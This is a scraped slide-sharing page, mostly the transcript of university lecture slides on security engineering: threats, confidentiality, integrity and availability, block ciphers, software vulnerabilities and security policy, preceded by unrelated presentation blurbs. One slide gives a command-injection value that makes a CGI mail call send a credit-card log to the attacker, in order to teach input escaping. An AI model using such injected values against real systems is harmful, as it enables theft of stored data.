Computer security involves managing malicious behavior involving information technology. It focuses on intentional rather than accidental threats from adversaries. Information security is important for organizations that rely on computer systems, including businesses, the military, healthcare, households, and society. The three main targets of information security are confidentiality, integrity, and availability of information and systems. Block ciphers like DES and AES are commonly used for encryption to provide these security properties.
Presentation by Luc de Graeve at the Gordon institute of business science in 2001.
This presentation is about security in e-commerce and is aimed at making people aware of what hackers do, how they do it and the financial implications of their actions. The presentation begins with a few examples of defaced websites and ends with a discussion on risk and assessment.
The presentation discussed the what is e-commerce security and its dimensions, threat concerns, ways to protect e-commerce site from hacking and fraud. It also includes the different e-commerce payment methods.
Presentation by Luc de Graeve at the Gordon institute of business science in 2001.
This presentation is about security in e-commerce and is aimed at making people aware of what hackers do, how they do it and the financial implications of their actions. The presentation begins with a few examples of defaced websites and ends with a discussion on risk and assessment.
The presentation discussed the what is e-commerce security and its dimensions, threat concerns, ways to protect e-commerce site from hacking and fraud. It also includes the different e-commerce payment methods.
Explain security issues and protection about unwanted threat in E-Commerce. Explain Security E-Commerce Environment. Security Threat in E-Commerce Environment.
Ethical Hacking Concepts and Scopes, Threats and Attack Vectors, Information Assurance, Threat Modelling
Enterprise Information Security Architecture, Vulnerability
Assessment and Penetration Testing
Types of Social Engineering, Insider Attack, Preventing Insider
Threats, Social Engineering Targets and Defence Strategies
Web Application Security session conducted by Lightracers Consulting for web developers. In this learning presentation, we will look at - What is Cyber Crime, Types of Cyber crime, What is Cyber Security, Types of Threats, Overview of OWASP, OWASP Top 10 Vulnerabilities (SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Security Misconfiguration, Sensitive Data exposure, etc.) and Protection measures.
The Different Dimensions of E-commerce Security
•
•
•
•
•
•
Integrity
◦ The ability to ensure that information being displayed on a web
site or transmitted or received over the internet has not been
altered in any way by an unauthorized party
Nonrepudiation
◦ The ability to ensure that e-commerce participants do not deny (i.e.
repudiate) their online actions
Authenticity
◦ The ability to identify the identity of a person or entity with whom
you are dealing in the internet
Confidentiality
◦ The ability to ensure that messages and data are available only to
those who are authorized to view them
Privacy
◦ The ability to control the use of information about oneself
Availability
◦ The ability to ensure that an e-commerce site continues top
function as intended.
Explain security issues and protection about unwanted threat in E-Commerce. Explain Security E-Commerce Environment. Security Threat in E-Commerce Environment.
Ethical Hacking Concepts and Scopes, Threats and Attack Vectors, Information Assurance, Threat Modelling
Enterprise Information Security Architecture, Vulnerability
Assessment and Penetration Testing
Types of Social Engineering, Insider Attack, Preventing Insider
Threats, Social Engineering Targets and Defence Strategies
Web Application Security session conducted by Lightracers Consulting for web developers. In this learning presentation, we will look at - What is Cyber Crime, Types of Cyber crime, What is Cyber Security, Types of Threats, Overview of OWASP, OWASP Top 10 Vulnerabilities (SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Security Misconfiguration, Sensitive Data exposure, etc.) and Protection measures.
The Different Dimensions of E-commerce Security
•
•
•
•
•
•
Integrity
◦ The ability to ensure that information being displayed on a web
site or transmitted or received over the internet has not been
altered in any way by an unauthorized party
Nonrepudiation
◦ The ability to ensure that e-commerce participants do not deny (i.e.
repudiate) their online actions
Authenticity
◦ The ability to identify the identity of a person or entity with whom
you are dealing in the internet
Confidentiality
◦ The ability to ensure that messages and data are available only to
those who are authorized to view them
Privacy
◦ The ability to control the use of information about oneself
Availability
◦ The ability to ensure that an e-commerce site continues top
function as intended.
Lecture 6 Software Engineering and Design Good Design op205
3F6 Software Engineering and Design, February 2012, lecture slides 6, Good Design, Guest lecture by Igor Drokov, CEO Cronto Ltd, Cambridge University Engineering Department
Lecture 7 Software Engineering and Design User Interface Design op205
3F6 Software Engineering and Design, February 2012, lecture slides 7, User Interface Design, Dr Elena Punskaya, Cambridge University Engineering Department
Some basic overview about cyber crime @ health industry and 10 cyber security technology controls advises from IT Security system integrator's point of view.
Top Cyber Security Interview Questions and Answers 2022.pdfCareerera
Cyber security positions have considerably taken the top list in the job market. Candidates vying for elite positions in the field of cyber security certainly need a clear-cut and detailed guide to channeling their preparation for smooth career growth, beginning with getting a job. We have curated the top cyber security interview questions that will help candidates focus on the key areas. We have classified the regularly asked cyber security interview questions here, in this article into different levels starting from basic general questions to advanced technical ones.
Before we move on to the top cyber security interview questions, it is critical to reflect on the vitality of cyber security in our modern times and how cyber security professionals are catering to the needs of securing a safe cyber ecosystem.
The times we live in is defined by the digital transition, in which the internet, electronic devices, and computers have become an integral part of our daily life. Institutions that serve our daily needs, such as banks and hospitals, now rely on internet-connected equipment to give the best possible service. A portion of their data, such as financial and personal information, has become vulnerable to illegal access, posing serious risks. Intruders utilize this information to carry out immoral and criminal goals.
Cyber-attacks have jeopardized the computer system and its arrangements, which has now become a global concern. To safeguard data from security breaches, a comprehensive cyber security policy is needed now more than ever. The rising frequency of cyber-attacks has compelled corporations and organizations working with national security and sensitive data to implement stringent security procedures and restrictions.
Computers, mobile devices, servers, data, electronic systems, networks, and other systems connected to the internet must be protected from harmful attacks. Cybersecurity, which is a combination of the words "cyber" and "security," provides this protection. 'Cyber' imbibes the vast-ranging technology with systems, networks, programs, and data in the aforementioned procedure. The phrase "security" refers to the process of protecting data, networks, applications, and systems. In a nutshell,
cyber security is a combination of principles and approaches that assist prevent unwanted access to data, networks, programs, and devices by meeting the security needs of technological resources (computer-based) and online databases.
Cyber Security introduction. Cyber security definition. Vulnerabilities. Social engineering and human error. Financial cost of security breaches. Computer protection. The cyber security job market
Encryption and Key Management: Ensuring Compliance, Privacy, and Minimizing t...IBM Security
Encryption and Key Management: Ensuring Compliance, Privacy, and Minimizing the Impact of a Breach
Encryption has been viewed as the ultimate way to protect sensitive data for compliance. But it has also been considered very complex to implement. Today, encryption is essential to meet compliance objectives, and has become much simpler to implement. The challenge is knowing when and where to use encryption, how it can simplify compliance, what controls need to be in place, and the options for good encryption key management. This session will cover the options for encryption and key management, what each provides, and their requirements. Encryption and key management topics include application-level encryption for data in use, network encryption of data in motion, and storage encryption for data at rest.
This ppt contains information about definition of computer & information security, types of attacks, services, mechanisms, controls and model for network security
Presentation by Larry Clinton, President of the Internet Security Alliance (ISA) to the 66th Annual Fowler Seminar on Oct 12 2012 titled Evolution of the Cyber Threat - A Unified Systems Approach.
Lecture 4 Software Engineering and Design Brief Introduction to Programmingop205
3F6 Software Engineering and Design, January 2012, lecture slides 4, Brief Introduction to Programming Languages, Dr Elena Punskaya, Cambridge University Engineering Department
Lecture 3 Software Engineering and Design Introduction to UMLop205
3F6 Software Engineering and Design, January 2012, lecture slides 3, Introduction to UML, Dr Elena Punskaya, Cambridge University Engineering Department
Lecture 2 Software Engineering and Design Object Oriented Programming, Design...op205
3F6 Software Engineering and Design, January 2012, lecture slides 2, Object Oriented Programming, Design and Analysis, Dr Elena Punskaya, Cambridge University Engineering Department
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
3 f6 security
1. Security Engineering
Steven J. Murdoch
Computer Laboratory
Based on Security I course by Markus Kuhn
1
2. Computer Security / Information Security
Definition
Computer Security: the discipline of managing malicious intent and
behaviour involving information and communication technology
2
3. Computer Security / Information Security
Definition
Computer Security: the discipline of managing malicious intent and
behaviour involving information and communication technology
Malicious behaviour can include
Fraud/theft – unauthorised access to money, goods or services
Vandalism – causing damage for personal reasons (frustration, envy,
revenge, curiosity, self esteem, peer recognition, . . . )
Terrorism – causing damage, disruption and fear to intimidate
Warfare – damaging military assets to overthrow a government
Espionage – stealing information to gain competitive advantage
Sabotage – causing damage to gain competitive advantage
“Spam” – unsolicited marketing wasting time/resources
Illegal content – child sexual abuse images, Nazi materials, . . .
2
4. Computer Security / Information Security
Definition
Computer Security: the discipline of managing malicious intent and
behaviour involving information and communication technology
Malicious behaviour can include
Fraud/theft – unauthorised access to money, goods or services
Vandalism – causing damage for personal reasons (frustration, envy,
revenge, curiosity, self esteem, peer recognition, . . . )
Terrorism – causing damage, disruption and fear to intimidate
Warfare – damaging military assets to overthrow a government
Espionage – stealing information to gain competitive advantage
Sabotage – causing damage to gain competitive advantage
“Spam” – unsolicited marketing wasting time/resources
Illegal content – child sexual abuse images, Nazi materials, . . .
Security vs safety engineering: focus on intentional rather than
accidental behaviour, presence of intelligent adversary.
2
5. Where is information security a concern?
Many organisations are today critically dependent on the flawless
operation of computer systems. Without these, we might lose
in a business environment:
3
6. Where is information security a concern?
Many organisations are today critically dependent on the flawless
operation of computer systems. Without these, we might lose
in a business environment: legal compliance, cash flow, business
continuity, profitability, commercial image and shareholder
confidence, product integrity, intellectual property and competitive
advantage
in a military environment:
3
7. Where is information security a concern?
Many organisations are today critically dependent on the flawless
operation of computer systems. Without these, we might lose
in a business environment: legal compliance, cash flow, business
continuity, profitability, commercial image and shareholder
confidence, product integrity, intellectual property and competitive
advantage
in a military environment: exclusive access to and effectiveness of
weapons, electronic countermeasures, communications secrecy,
identification and location information, automated defences
in a medical environment:
3
8. Where is information security a concern?
Many organisations are today critically dependent on the flawless
operation of computer systems. Without these, we might lose
in a business environment: legal compliance, cash flow, business
continuity, profitability, commercial image and shareholder
confidence, product integrity, intellectual property and competitive
advantage
in a military environment: exclusive access to and effectiveness of
weapons, electronic countermeasures, communications secrecy,
identification and location information, automated defences
in a medical environment: confidentiality and integrity of patient
records, unhindered emergency access, equipment safety, correct
diagnosis and treatment information
in households:
3
9. Where is information security a concern?
Many organisations are today critically dependent on the flawless
operation of computer systems. Without these, we might lose
in a business environment: legal compliance, cash flow, business
continuity, profitability, commercial image and shareholder
confidence, product integrity, intellectual property and competitive
advantage
in a military environment: exclusive access to and effectiveness of
weapons, electronic countermeasures, communications secrecy,
identification and location information, automated defences
in a medical environment: confidentiality and integrity of patient
records, unhindered emergency access, equipment safety, correct
diagnosis and treatment information
in households: PC, privacy, correct billing, burglar alarms
in society at large:
3
10. Where is information security a concern?
Many organisations are today critically dependent on the flawless
operation of computer systems. Without these, we might lose
in a business environment: legal compliance, cash flow, business
continuity, profitability, commercial image and shareholder
confidence, product integrity, intellectual property and competitive
advantage
in a military environment: exclusive access to and effectiveness of
weapons, electronic countermeasures, communications secrecy,
identification and location information, automated defences
in a medical environment: confidentiality and integrity of patient
records, unhindered emergency access, equipment safety, correct
diagnosis and treatment information
in households: PC, privacy, correct billing, burglar alarms
in society at large: utility services, communications, transport,
tax/benefits collection, goods supply, . . .
3
11. Common information security targets
Most information-security concerns fall into three broad categories:
Confidentiality ensuring that information is accessible only to those
authorised to have access
Integrity safeguarding the accuracy and completeness of
information and processing methods
Availability ensuring that authorised users have access to
information and associated assets when required
4
12. Blockciphers
Encryption is performed today typically with blockcipher algorithms,
which are key-dependent permutations, operating on bit-block alphabets.
Typical alphabet sizes: 264 or 2128
E : {0, 1}k × {0, 1}n → {0, 1}n
Confusion – make relationship between key and ciphertext as
complex as possible
Diffusion – remove statistical links between plaintext and ciphertext
Prevent adaptive chosen-plaintext attacks, including differential and
linear cryptanalysis
Product cipher: iterate many rounds of a weak pseudo-random
permutation to get a strong one
Feistel structure, substitution/permutation network, key-dependent
s-boxes, mix incompatible groups, transpositions, linear
transformations, arithmetic operations, substitutions, . . .
5
13. Block cipher standards
In 1977, the US government standardized a block cipher for unclassified
data, based on a proposal by an IBM team led by Horst Feistel.
DES has a block size of 64 bits and a key size of 56 bits. The relatively
short key size and its limited protection against brute-force key searches
immediately triggered criticism, but this did not prevent DES from
becoming the most commonly used cipher for banking networks and
numerous other applications for more than 25 years.
6
14. Block cipher standards
In 1977, the US government standardized a block cipher for unclassified
data, based on a proposal by an IBM team led by Horst Feistel.
DES has a block size of 64 bits and a key size of 56 bits. The relatively
short key size and its limited protection against brute-force key searches
immediately triggered criticism, but this did not prevent DES from
becoming the most commonly used cipher for banking networks and
numerous other applications for more than 25 years.
In November 2001, the US government published the new Advanced
Encryption Standard (AES), the official DES successor with 128-bit block
size and either 128, 192 or 256 bit key length. It adopted the “Rijndael”
cipher designed by Joan Daemen and Vincent Rijmen, which offers
additional block/key size combinations.
Recent CPUs with AES hardware support: Intel/AMD x86 AES-NI instructions, VIA PadLock.
6
15. Electronic Code Book (ECB)
P1 P2 Pn
EK EK ··· EK
C1 C2 Cn
In the simplest mode of operation standardised for DES, AES, and
other block ciphers, the message is cut into n m-bit blocks, where m is
the block size of the cipher, and then the cipher function is applied to
each block individually.
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
7
22. Common software vulnerabilities
Missing checks for data size (→ stack buffer overflow)
Missing checks for data content (e.g., shell meta characters)
Missing checks for boundary conditions
Missing checks for success/failure of operations
Missing locks – insufficient serialisation
Race conditions – time of check to time of use
Incomplete checking of environment
Unexpected side channels (timing, etc.)
Lack of authentication
The “curses of security” (Gollmann): change, complacency, convenience
(software reuse for inappropriate purposes, too large TCB, etc.)
C.E. Landwehr, et al.: A taxonomy of computer program security flaws, with examples.
ACM Computing Surveys 26(3), September 1994.
http://dx.doi.org/10.1145/185403.185412
14
23. Example for a missing check of data size
A C program declares a local short string variable
char buffer[80];
and then uses the standard C library routine call
gets(buffer);
to read a single text line from standard input and save it into buffer.
This works fine for normal-length lines but corrupts the stack if the input
is longer than 79 characters. Attacker loads malicious code into buffer
and redirects return address to its start:
Memory: Program Data Heap free Stack
Stack: . . . ? buffer[80] FP RET Parameters
- ...
15
24. Example for missing check of input data
A web server allows users to provide an email address in a form field to
receive a file. The address is received by a na¨
ıvely implemented Perl CGI
script and stored in the variable $email. The CGI script then attempts
to send out the email with the command
system("mail $email <message");
This works fine as long as $email contains only a normal email address,
free of shell meta-characters. An attacker provides a carefully selected
pathological address such as
trustno1@hotmail.com < /var/db/creditcards.log ; echo
and executes arbitrary commands (here to receive confidential data via
email). The solution requires that each character with special meaning
handed over to another software is prefixed with a suitable escape symbol
(e.g., or ’...’ in the case of the Unix shell). This requires a detailed
understanding of the recipient’s complete syntax.
Checks for meta characters are also frequently forgotten for text that is passed on to SQL engines,
embedded into HTML pages, etc.
16
25. Integer overflows
Integer numbers in computers behave differently from integer numbers in
mathematics. For an unsigned 8-bit integer value, we have
255 + 1 == 0
0 - 1 == 255
16 * 17 == 16
and likewise for a signed 8-bit value, we have
127 + 1 == -128
-128 / -1 == -128
And what looks like an obvious endless loop
int i = 1;
while (i > 0)
i = i * 2;
terminates after 15, 31, or 63 steps (depending on the register size).
17
26. Security Management and Engineering I
“Is this product/technique/service secure?”
Simple Yes/No answers are often wanted, but typically inappropriate.
Security of an item depends much on the context in which it is used.
Complex systems can provide a very large number of elements and
interactions that are open to abuse. An effective protection can therefore
only be obtained as the result of a systematic planning approach.
18
27. Security Management and Engineering II
“No need to worry, our product is 100% secure. All data is
encrypted with 128-bit keys. It takes billions of years to break
these.”
Such statements are abundant in marketing literature. A security
manager should ask:
What does the mechanism achieve?
Do we need confidentiality, integrity or availability of exactly this
data?
Who will generate the keys and how?
Who will store / have access to the keys?
Can we lose keys and with them data?
Will it interfere with other security measures (backup, auditing,
scanning, . . . )?
Will it introduce new vulnerabilities or can it somehow be used
against us?
What if it breaks or is broken?
...
19
28. Security policy development
Step 1: Security requirements analysis
Identify assets and their value
Identify vulnerabilities, threats and risk priorities
Identify legal and contractual requirements
Step 2: Work out a suitable security policy
The security requirements identified can be complex and may have to be
abstracted first into a high-level security policy, a set of rules that
clarifies which are or are not authorised, required, and prohibited
activities, states and information flows.
Security policy models are techniques for the precise and even formal
definition of such protection goals. They can describe both automatically
enforced policies (e.g., a mandatory access control configuration in an
operating system, a policy description language for a database management
system, etc.) and procedures for employees (e.g., segregation of duties).
20
29. Step 3: Security policy document
Once a good understanding exists of what exactly security means for an
organisation and what needs to be protected or enforced, the high-level
security policy should be documented as a reference for anyone involved
in implementing controls. It should clearly lay out the overall objectives,
principles and the underlying threat model that are to guide the choice of
mechanisms in the next step.
Step 4: Selection and implementation of controls
Issues addressed in a typical low-level organisational security policy:
General (affecting everyone) and specific responsibilities for security
Names manager who “owns” the overall policy and is in charge of its
continued enforcement, maintenance, review, and evaluation of
effectiveness
Names individual managers who “own” individual information assets and
are responsible for their day-to-day security
Reporting responsibilities for security incidents, vulnerabilities, software
malfunctions
Mechanisms for learning from incidents
21
30. Incentives, disciplinary process, consequences of policy violations
User training, documentation and revision of procedures
Personnel security (depending on sensitivity of job)
Background checks, supervision, confidentiality agreement
Regulation of third-party access
Physical security
Definition of security perimeters, locating facilities to minimise traffic across perimeters,
alarmed fire doors, physical barriers that penetrate false floors/ceilings, entrance controls,
handling of visitors and public access, visible identification, responsibility to challenge
unescorted strangers, location of backup equipment at safe distance, prohibition of recording
equipment, redundant power supplies, access to cabling, authorisation procedure for removal
of property, clear desk/screen policy, etc.
Segregation of duties
Avoid that a single person can abuse authority without detection (e.g., different people must
raise purchase order and confirm delivery of goods, croupier vs. cashier in casino)
Audit trails
What activities are logged, how are log files protected from manipulation
Separation of development and operational facilities
Protection against unauthorised and malicious software
22
31. Organising backup and rehearsing restoration
File/document access control, sensitivity labeling of documents and media
Disposal of media
Zeroise, degauss, reformat, or shred and destroy storage media, paper, carbon paper, printer
ribbons, etc. before discarding it.
Network and software configuration management
Line and file encryption, authentication, key and password management
Duress alarms, terminal timeouts, clock synchronisation, . . .
For more detailed check lists and guidelines for writing informal security policy
documents along these lines, see for example
British Standard 7799 “Code of practice for information security
management”
German Information Security Agency’s “IT Baseline Protection Manual”
http://www.bsi.bund.de/english/gshb/manual/
US DoD National Computer Security Center Rainbow Series, for military
policy guidelines
http://en.wikipedia.org/wiki/Rainbow_Series
23